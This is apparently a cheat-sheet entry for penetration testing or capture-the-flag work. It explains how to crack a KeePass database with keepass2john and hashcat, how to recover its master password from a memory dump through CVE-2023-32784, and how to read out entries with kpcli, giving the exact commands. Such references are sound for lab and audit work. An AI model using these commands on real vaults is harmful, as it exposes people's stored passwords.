← Back to search

Crack & Open KeePass Databases

credentialstool

Summary

Convert a .kdbx file to a crackable hash for hashcat/john, or recover the master key from a memory dump (CVE-2023-32784), then browse entries with kpcli.

Walkthrough

Recover the contents of a KeePass database either by cracking its master password or by extracting the key from a process memory dump.

Steps

  1. When you only have the .kdbx file, convert it with keepass2john and crack the resulting hash using hashcat mode 13400 (or john) against rockyou.txt.
  2. If you captured a memory dump (KeePassDumpFull.dmp), use the CVE-2023-32784 technique: strings the dump and grep for the master-password marker bytes to recover most of the master password (the dotnet PoC reconstructs it fully).
  3. Once you know the master password, open the database with kpcli --kdb <file> and use show -f [num] to reveal stored entries.

Commands

bash

keepass2john CEH.kdbx > CEH.kdbx.hash
hashcat -m 13400 CEH.kdbx.hash /usr/share/wordlists/rockyou.txt

bash

strings -e S KeePassDumpFull.dmp | grep -a $(printf "%b" "\xCF\x25\xCF\x25")

bash

kpcli --kdb CEH.kdbx
show -f [num]